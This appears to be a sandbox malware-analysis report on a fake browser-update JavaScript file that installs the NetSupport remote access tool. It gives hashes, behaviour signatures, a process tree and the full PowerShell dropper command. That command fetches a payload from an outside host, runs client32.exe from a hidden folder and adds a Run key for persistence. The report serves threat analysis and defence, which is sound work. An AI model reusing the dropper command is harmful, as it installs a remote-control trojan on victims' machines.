Overview

overview

10

Static

static

1

Update_bro...436.js

windows10-1703-x64

10

Update_bro...436.js

windows10-2004-x64

10

Update_bro...436.js

windows11-21h2-x64

10

Analysis

  • max time kernel
    316s
  • max time network
    1792s
  • platform
    windows10-1703_x64
  • resource
    win10-20231220-en
  • resource tags

    arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09/01/2024, 20:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Update_browser_17.6436.js

  • Size

    296KB

  • MD5

    fd24b53547b889be132aa98a7f193614

  • SHA1

    c5331d01d1149e8b5846d076afaa3f60f5458f99

  • SHA256

    d8f2134faeed8cf62887aaad8403ab7f29b5cd26cd03b81cb59774442d97fc0e

  • SHA512

    54995b6a818f870655cd33b2b4cdf1185cdfbb91ecf6c8217834ec454041039a4defd7c178851ac11bc32d61d08dd92a2a6207ce90071d2d7987019ae9074c79

  • SSDEEP

    3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2BOOpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6BvcJ6QhO1T7cZd6Bp

Score
10/10
netsupportpersistencerat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://boxtechcompany.com/data.php?9681
exe.dropper

https://boxtechcompany.com/data.php?9681

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_browser_17.6436.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $whubNclzRpNUFchqtLtkjr='https://boxtechcompany.com/data.php?9681';$HhSabTsTaRWAecAVWookgFyUGEiPzWRnmOt=(New-Object System.Net.WebClient).DownloadString($whubNclzRpNUFchqtLtkjr);$RRmmWUdEpIkWsSbxEkxpti=[System.Convert]::FromBase64String($HhSabTsTaRWAecAVWookgFyUGEiPzWRnmOt);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $beWQbClTwOYQbxASbmDjlcdi=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $beWQbClTwOYQbxASbmDjlcdi -PathType Container)) { New-Item -Path $beWQbClTwOYQbxASbmDjlcdi -ItemType Directory };$p=Join-Path $beWQbClTwOYQbxASbmDjlcdi 'vib.zip';[System.IO.File]::WriteAllBytes($p,$RRmmWUdEpIkWsSbxEkxpti);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$beWQbClTwOYQbxASbmDjlcdi)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $beWQbClTwOYQbxASbmDjlcdi 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $beWQbClTwOYQbxASbmDjlcdi -Force; $FSDFSSD.attributes='Hidden';$s=$beWQbClTwOYQbxASbmDjlcdi+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4596
      • C:\Users\Admin\AppData\Roaming\DIVX-309\client32.exe
        "C:\Users\Admin\AppData\Roaming\DIVX-309\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:4824

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hztkkti.ewk.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • memory/4596-4-0x000002704AE40000-0x000002704AE62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4596-9-0x000002704A860000-0x000002704A870000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4596-8-0x000002704A860000-0x000002704A870000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4596-10-0x0000027063110000-0x0000027063186000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4596-6-0x00007FFFB52E0000-0x00007FFFB5CCC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4596-25-0x000002704A860000-0x000002704A870000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4596-44-0x00000270634B0000-0x00000270634C2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4596-43-0x00000270630F0000-0x00000270630FA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4596-116-0x00007FFFB52E0000-0x00007FFFB5CCC000-memory.dmp

    Filesize

    9.9MB

    Download